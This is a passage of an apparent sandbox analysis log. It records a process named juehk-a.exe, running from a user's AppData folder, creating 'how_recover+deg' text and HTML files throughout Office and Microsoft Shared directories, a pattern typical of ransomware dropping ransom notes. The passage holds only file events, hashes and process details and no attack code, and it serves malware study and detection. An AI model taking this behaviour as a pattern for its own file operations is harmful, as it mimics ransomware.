17332.          filesize: 9480
17333.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17334.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17335.          processinfo:
17336.            pid: 1648
17337.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17338.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17339.            ads:
17340.          fid (ads:): 562949953521195
17341.          ntstatus: 0x0
17342.          CreateOptions: 0x0
17343.        file:
17344.          timestamp: 76808
17345.          mode: created
17346.          sequenceNumber: 1228
17347.          value: C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\how_recover+deg.txt
17348.          processinfo:
17349.            pid: 1648
17350.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17351.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17352.            ads:
17353.          fid (ads:): 1125899906942508
17354.          ntstatus: 0x0
17355.          CreateOptions: 0x60
17356.        file:
17357.          timestamp: 76814
17358.          mode: close
17359.          sequenceNumber: 1229
17360.          value: C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\how_recover+deg.txt
17361.          filesize: 2673
17362.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17363.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17364.          processinfo:
17365.            pid: 1648
17366.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17367.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17368.            ads:
17369.          fid (ads:): 1125899906942508
17370.          ntstatus: 0x0
17371.          CreateOptions: 0x0
17372.        file:
17373.          timestamp: 76910
17374.          mode: created
17375.          sequenceNumber: 1230
17376.          value: C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\how_recover+deg.html
17377.          processinfo:
17378.            pid: 1648
17379.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17380.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17381.            ads:
17382.          fid (ads:): 844424930231853
17383.          ntstatus: 0x0
17384.          CreateOptions: 0x60
17385.        file:
17386.          timestamp: 76916
17387.          mode: close
17388.          sequenceNumber: 1231
17389.          value: C:\Program Files\Common Files\Microsoft Shared\MSClientDataMgr\how_recover+deg.html
17390.          filesize: 9480
17391.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17392.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17393.          processinfo:
17394.            pid: 1648
17395.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17396.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17397.            ads:
17398.          fid (ads:): 844424930231853
17399.          ntstatus: 0x0
17400.          CreateOptions: 0x0
17401.        file:
17402.          timestamp: 76921
17403.          mode: created
17404.          sequenceNumber: 1232
17405.          value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\how_recover+deg.txt
17406.          processinfo:
17407.            pid: 1648
17408.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17409.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17410.            ads:
17411.          fid (ads:): 562949953521198
17412.          ntstatus: 0x0
17413.          CreateOptions: 0x60
17414.        file:
17415.          timestamp: 76930
17416.          mode: close
17417.          sequenceNumber: 1233
17418.          value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\how_recover+deg.txt
17419.          filesize: 2673
17420.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17421.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17422.          processinfo:
17423.            pid: 1648
17424.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17425.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17426.            ads:
17427.          fid (ads:): 562949953521198
17428.          ntstatus: 0x0
17429.          CreateOptions: 0x0
17430.        file:
17431.          timestamp: 76936
17432.          mode: created
17433.          sequenceNumber: 1234
17434.          value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\how_recover+deg.html
17435.          processinfo:
17436.            pid: 1648
17437.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17438.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17439.            ads:
17440.          fid (ads:): 844424930231855
17441.          ntstatus: 0x0
17442.          CreateOptions: 0x60
17443.        file:
17444.          timestamp: 76940
17445.          mode: close
17446.          sequenceNumber: 1235
17447.          value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\how_recover+deg.html
17448.          filesize: 9480
17449.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17450.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17451.          processinfo:
17452.            pid: 1648
17453.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17454.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17455.            ads:
17456.          fid (ads:): 844424930231855
17457.          ntstatus: 0x0
17458.          CreateOptions: 0x0
17459.        file:
17460.          timestamp: 76947
17461.          mode: created
17462.          sequenceNumber: 1236
17463.          value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\how_recover+deg.txt
17464.          processinfo:
17465.            pid: 1648
17466.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17467.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17468.            ads:
17469.          fid (ads:): 562949953521200
17470.          ntstatus: 0x0
17471.          CreateOptions: 0x60
17472.        file:
17473.          timestamp: 76953
17474.          mode: close
17475.          sequenceNumber: 1237
17476.          value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\how_recover+deg.txt
17477.          filesize: 2673
17478.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17479.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17480.          processinfo:
17481.            pid: 1648
17482.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17483.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17484.            ads:
17485.          fid (ads:): 562949953521200
17486.          ntstatus: 0x0
17487.          CreateOptions: 0x0
17488.        file:
17489.          timestamp: 76980
17490.          mode: created
17491.          sequenceNumber: 1238
17492.          value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\how_recover+deg.html
17493.          processinfo:
17494.            pid: 1648
17495.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17496.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17497.            ads:
17498.          fid (ads:): 562949953521201
17499.          ntstatus: 0x0
17500.          CreateOptions: 0x60
17501.        file:
17502.          timestamp: 76986
17503.          mode: close
17504.          sequenceNumber: 1239
17505.          value: C:\Program Files\Common Files\Microsoft Shared\MSInfo\how_recover+deg.html
17506.          filesize: 9480
17507.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17508.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17509.          processinfo:
17510.            pid: 1648
17511.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17512.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17513.            ads:
17514.          fid (ads:): 562949953521201
17515.          ntstatus: 0x0
17516.          CreateOptions: 0x0
17517.        file:
17518.          timestamp: 77024
17519.          mode: created
17520.          sequenceNumber: 1240
17521.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\1033\how_recover+deg.txt
17522.          processinfo:
17523.            pid: 1648
17524.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17525.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17526.            ads:
17527.          fid (ads:): 562949953521202
17528.          ntstatus: 0x0
17529.          CreateOptions: 0x60
17530.        file:
17531.          timestamp: 77030
17532.          mode: close
17533.          sequenceNumber: 1241
17534.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\1033\how_recover+deg.txt
17535.          filesize: 2673
17536.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17537.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17538.          processinfo:
17539.            pid: 1648
17540.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17541.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17542.            ads:
17543.          fid (ads:): 562949953521202
17544.          ntstatus: 0x0
17545.          CreateOptions: 0x0
17546.        file:
17547.          timestamp: 77037
17548.          mode: created
17549.          sequenceNumber: 1242
17550.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\1033\how_recover+deg.html
17551.          processinfo:
17552.            pid: 1648
17553.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17554.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17555.            ads:
17556.          fid (ads:): 844424930231859
17557.          ntstatus: 0x0
17558.          CreateOptions: 0x60
17559.        file:
17560.          timestamp: 77043
17561.          mode: close
17562.          sequenceNumber: 1243
17563.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\1033\how_recover+deg.html
17564.          filesize: 9480
17565.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17566.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17567.          processinfo:
17568.            pid: 1648
17569.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17570.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17571.            ads:
17572.          fid (ads:): 844424930231859
17573.          ntstatus: 0x0
17574.          CreateOptions: 0x0
17575.        file:
17576.          timestamp: 77075
17577.          mode: created
17578.          sequenceNumber: 1244
17579.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Cultures\how_recover+deg.txt
17580.          processinfo:
17581.            pid: 1648
17582.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17583.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17584.            ads:
17585.          fid (ads:): 562949953521204
17586.          ntstatus: 0x0
17587.          CreateOptions: 0x60
17588.        file:
17589.          timestamp: 77080
17590.          mode: close
17591.          sequenceNumber: 1245
17592.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Cultures\how_recover+deg.txt
17593.          filesize: 2673
17594.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17595.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17596.          processinfo:
17597.            pid: 1648
17598.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17599.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17600.            ads:
17601.          fid (ads:): 562949953521204
17602.          ntstatus: 0x0
17603.          CreateOptions: 0x0
17604.        file:
17605.          timestamp: 77086
17606.          mode: created
17607.          sequenceNumber: 1246
17608.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Cultures\how_recover+deg.html
17609.          processinfo:
17610.            pid: 1648
17611.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17612.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17613.            ads:
17614.          fid (ads:): 1407374883653173
17615.          ntstatus: 0x0
17616.          CreateOptions: 0x60
17617.        file:
17618.          timestamp: 77093
17619.          mode: close
17620.          sequenceNumber: 1247
17621.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Cultures\how_recover+deg.html
17622.          filesize: 9480
17623.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17624.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17625.          processinfo:
17626.            pid: 1648
17627.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17628.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17629.            ads:
17630.          fid (ads:): 1407374883653173
17631.          ntstatus: 0x0
17632.          CreateOptions: 0x0
17633.        file:
17634.          timestamp: 77174
17635.          mode: created
17636.          sequenceNumber: 1248
17637.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Cartridges\how_recover+deg.txt
17638.          processinfo:
17639.            pid: 1648
17640.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17641.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17642.            ads:
17643.          fid (ads:): 562949953521206
17644.          ntstatus: 0x0
17645.          CreateOptions: 0x60
17646.        file:
17647.          timestamp: 77181
17648.          mode: close
17649.          sequenceNumber: 1249
17650.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Cartridges\how_recover+deg.txt
17651.          filesize: 2673
17652.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17653.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17654.          processinfo:
17655.            pid: 1648
17656.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17657.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17658.            ads:
17659.          fid (ads:): 562949953521206
17660.          ntstatus: 0x0
17661.          CreateOptions: 0x0
17662.        file:
17663.          timestamp: 77187
17664.          mode: created
17665.          sequenceNumber: 1250
17666.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Cartridges\how_recover+deg.html
17667.          processinfo:
17668.            pid: 1648
17669.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17670.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17671.            ads:
17672.          fid (ads:): 562949953521207
17673.          ntstatus: 0x0
17674.          CreateOptions: 0x60
17675.        file:
17676.          timestamp: 77193
17677.          mode: close
17678.          sequenceNumber: 1251
17679.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Cartridges\how_recover+deg.html
17680.          filesize: 9480
17681.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17682.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17683.          processinfo:
17684.            pid: 1648
17685.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17686.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17687.            ads:
17688.          fid (ads:): 562949953521207
17689.          ntstatus: 0x0
17690.          CreateOptions: 0x0
17691.        file:
17692.          timestamp: 77199
17693.          mode: created
17694.          sequenceNumber: 1252
17695.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\1033\how_recover+deg.txt
17696.          processinfo:
17697.            pid: 1648
17698.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17699.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17700.            ads:
17701.          fid (ads:): 562949953521208
17702.          ntstatus: 0x0
17703.          CreateOptions: 0x60
17704.        file:
17705.          timestamp: 77205
17706.          mode: close
17707.          sequenceNumber: 1253
17708.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\1033\how_recover+deg.txt
17709.          filesize: 2673
17710.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17711.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17712.          processinfo:
17713.            pid: 1648
17714.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17715.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17716.            ads:
17717.          fid (ads:): 562949953521208
17718.          ntstatus: 0x0
17719.          CreateOptions: 0x0
17720.        file:
17721.          timestamp: 77276
17722.          mode: created
17723.          sequenceNumber: 1254
17724.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\1033\how_recover+deg.html
17725.          processinfo:
17726.            pid: 1648
17727.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17728.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17729.            ads:
17730.          fid (ads:): 562949953521209
17731.          ntstatus: 0x0
17732.          CreateOptions: 0x60
17733.        file:
17734.          timestamp: 77281
17735.          mode: close
17736.          sequenceNumber: 1255
17737.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\1033\how_recover+deg.html
17738.          filesize: 9480
17739.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17740.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17741.          processinfo:
17742.            pid: 1648
17743.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17744.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17745.            ads:
17746.          fid (ads:): 562949953521209
17747.          ntstatus: 0x0
17748.          CreateOptions: 0x0
17749.        file:
17750.          timestamp: 77288
17751.          mode: created
17752.          sequenceNumber: 1256
17753.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\how_recover+deg.txt
17754.          processinfo:
17755.            pid: 1648
17756.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17757.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17758.            ads:
17759.          fid (ads:): 562949953521210
17760.          ntstatus: 0x0
17761.          CreateOptions: 0x60
17762.        file:
17763.          timestamp: 77295
17764.          mode: close
17765.          sequenceNumber: 1257
17766.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\how_recover+deg.txt
17767.          filesize: 2673
17768.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17769.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17770.          processinfo:
17771.            pid: 1648
17772.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17773.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17774.            ads:
17775.          fid (ads:): 562949953521210
17776.          ntstatus: 0x0
17777.          CreateOptions: 0x0
17778.        file:
17779.          timestamp: 77303
17780.          mode: created
17781.          sequenceNumber: 1258
17782.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\how_recover+deg.html
17783.          processinfo:
17784.            pid: 1648
17785.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17786.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17787.            ads:
17788.          fid (ads:): 844424930231867
17789.          ntstatus: 0x0
17790.          CreateOptions: 0x60
17791.        file:
17792.          timestamp: 77310
17793.          mode: close
17794.          sequenceNumber: 1259
17795.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\Resources\how_recover+deg.html
17796.          filesize: 9480
17797.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17798.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17799.          processinfo:
17800.            pid: 1648
17801.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17802.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17803.            ads:
17804.          fid (ads:): 844424930231867
17805.          ntstatus: 0x0
17806.          CreateOptions: 0x0
17807.        file:
17808.          timestamp: 77320
17809.          mode: created
17810.          sequenceNumber: 1260
17811.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\how_recover+deg.txt
17812.          processinfo:
17813.            pid: 1648
17814.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17815.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17816.            ads:
17817.          fid (ads:): 562949953521212
17818.          ntstatus: 0x0
17819.          CreateOptions: 0x60
17820.        file:
17821.          timestamp: 77325
17822.          mode: close
17823.          sequenceNumber: 1261
17824.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\how_recover+deg.txt
17825.          filesize: 2673
17826.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17827.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17828.          processinfo:
17829.            pid: 1648
17830.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17831.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17832.            ads:
17833.          fid (ads:): 562949953521212
17834.          ntstatus: 0x0
17835.          CreateOptions: 0x0
17836.        file:
17837.          timestamp: 77331
17838.          mode: created
17839.          sequenceNumber: 1262
17840.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\how_recover+deg.html
17841.          processinfo:
17842.            pid: 1648
17843.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17844.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17845.            ads:
17846.          fid (ads:): 562949953521213
17847.          ntstatus: 0x0
17848.          CreateOptions: 0x60
17849.        file:
17850.          timestamp: 77336
17851.          mode: close
17852.          sequenceNumber: 1263
17853.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\DataModel\how_recover+deg.html
17854.          filesize: 9480
17855.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17856.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17857.          processinfo:
17858.            pid: 1648
17859.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17860.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17861.            ads:
17862.          fid (ads:): 562949953521213
17863.          ntstatus: 0x0
17864.          CreateOptions: 0x0
17865.        file:
17866.          timestamp: 77572
17867.          mode: created
17868.          sequenceNumber: 1264
17869.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Access.en-us\how_recover+deg.txt
17870.          processinfo:
17871.            pid: 1648
17872.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17873.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17874.            ads:
17875.          fid (ads:): 1125899906942526
17876.          ntstatus: 0x0
17877.          CreateOptions: 0x60
17878.        file:
17879.          timestamp: 77579
17880.          mode: close
17881.          sequenceNumber: 1265
17882.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Access.en-us\how_recover+deg.txt
17883.          filesize: 2673
17884.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17885.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17886.          processinfo:
17887.            pid: 1648
17888.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17889.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17890.            ads:
17891.          fid (ads:): 1125899906942526
17892.          ntstatus: 0x0
17893.          CreateOptions: 0x0
17894.        file:
17895.          timestamp: 77587
17896.          mode: created
17897.          sequenceNumber: 1266
17898.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Access.en-us\how_recover+deg.html
17899.          processinfo:
17900.            pid: 1648
17901.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17902.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17903.            ads:
17904.          fid (ads:): 562949953521215
17905.          ntstatus: 0x0
17906.          CreateOptions: 0x60
17907.        file:
17908.          timestamp: 77593
17909.          mode: close
17910.          sequenceNumber: 1267
17911.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Access.en-us\how_recover+deg.html
17912.          filesize: 9480
17913.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17914.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17915.          processinfo:
17916.            pid: 1648
17917.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17918.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17919.            ads:
17920.          fid (ads:): 562949953521215
17921.          ntstatus: 0x0
17922.          CreateOptions: 0x0
17923.        file:
17924.          timestamp: 77604
17925.          mode: created
17926.          sequenceNumber: 1268
17927.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\DCF.en-us\how_recover+deg.txt
17928.          processinfo:
17929.            pid: 1648
17930.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17931.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17932.            ads:
17933.          fid (ads:): 562949953521216
17934.          ntstatus: 0x0
17935.          CreateOptions: 0x60
17936.        file:
17937.          timestamp: 77610
17938.          mode: close
17939.          sequenceNumber: 1269
17940.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\DCF.en-us\how_recover+deg.txt
17941.          filesize: 2673
17942.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
17943.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
17944.          processinfo:
17945.            pid: 1648
17946.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17947.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17948.            ads:
17949.          fid (ads:): 562949953521216
17950.          ntstatus: 0x0
17951.          CreateOptions: 0x0
17952.        file:
17953.          timestamp: 77639
17954.          mode: created
17955.          sequenceNumber: 1270
17956.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\DCF.en-us\how_recover+deg.html
17957.          processinfo:
17958.            pid: 1648
17959.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17960.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17961.            ads:
17962.          fid (ads:): 844424930231873
17963.          ntstatus: 0x0
17964.          CreateOptions: 0x60
17965.        file:
17966.          timestamp: 77646
17967.          mode: close
17968.          sequenceNumber: 1271
17969.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\DCF.en-us\how_recover+deg.html
17970.          filesize: 9480
17971.          md5sum: a68c3caf0be8f1a393c697136926cfd4
17972.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
17973.          processinfo:
17974.            pid: 1648
17975.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17976.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17977.            ads:
17978.          fid (ads:): 844424930231873
17979.          ntstatus: 0x0
17980.          CreateOptions: 0x0
17981.        file:
17982.          timestamp: 77655
17983.          mode: created
17984.          sequenceNumber: 1272
17985.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Excel.en-us\how_recover+deg.txt
17986.          processinfo:
17987.            pid: 1648
17988.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
17989.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
17990.            ads:
17991.          fid (ads:): 844424930231874
17992.          ntstatus: 0x0
17993.          CreateOptions: 0x60
17994.        file:
17995.          timestamp: 77661
17996.          mode: close
17997.          sequenceNumber: 1273
17998.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Excel.en-us\how_recover+deg.txt
17999.          filesize: 2673
18000.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18001.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18002.          processinfo:
18003.            pid: 1648
18004.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18005.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18006.            ads:
18007.          fid (ads:): 844424930231874
18008.          ntstatus: 0x0
18009.          CreateOptions: 0x0
18010.        file:
18011.          timestamp: 77715
18012.          mode: created
18013.          sequenceNumber: 1274
18014.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Excel.en-us\how_recover+deg.html
18015.          processinfo:
18016.            pid: 1648
18017.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18018.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18019.            ads:
18020.          fid (ads:): 844424930231875
18021.          ntstatus: 0x0
18022.          CreateOptions: 0x60
18023.        file:
18024.          timestamp: 77724
18025.          mode: close
18026.          sequenceNumber: 1275
18027.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Excel.en-us\how_recover+deg.html
18028.          filesize: 9480
18029.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18030.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18031.          processinfo:
18032.            pid: 1648
18033.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18034.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18035.            ads:
18036.          fid (ads:): 844424930231875
18037.          ntstatus: 0x0
18038.          CreateOptions: 0x0
18039.        file:
18040.          timestamp: 77777
18041.          mode: created
18042.          sequenceNumber: 1276
18043.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Groove.en-us\how_recover+deg.txt
18044.          processinfo:
18045.            pid: 1648
18046.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18047.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18048.            ads:
18049.          fid (ads:): 562949953521220
18050.          ntstatus: 0x0
18051.          CreateOptions: 0x60
18052.        file:
18053.          timestamp: 77786
18054.          mode: close
18055.          sequenceNumber: 1277
18056.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Groove.en-us\how_recover+deg.txt
18057.          filesize: 2673
18058.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18059.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18060.          processinfo:
18061.            pid: 1648
18062.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18063.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18064.            ads:
18065.          fid (ads:): 562949953521220
18066.          ntstatus: 0x0
18067.          CreateOptions: 0x0
18068.        file:
18069.          timestamp: 77797
18070.          mode: created
18071.          sequenceNumber: 1278
18072.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Groove.en-us\how_recover+deg.html
18073.          processinfo:
18074.            pid: 1648
18075.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18076.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18077.            ads:
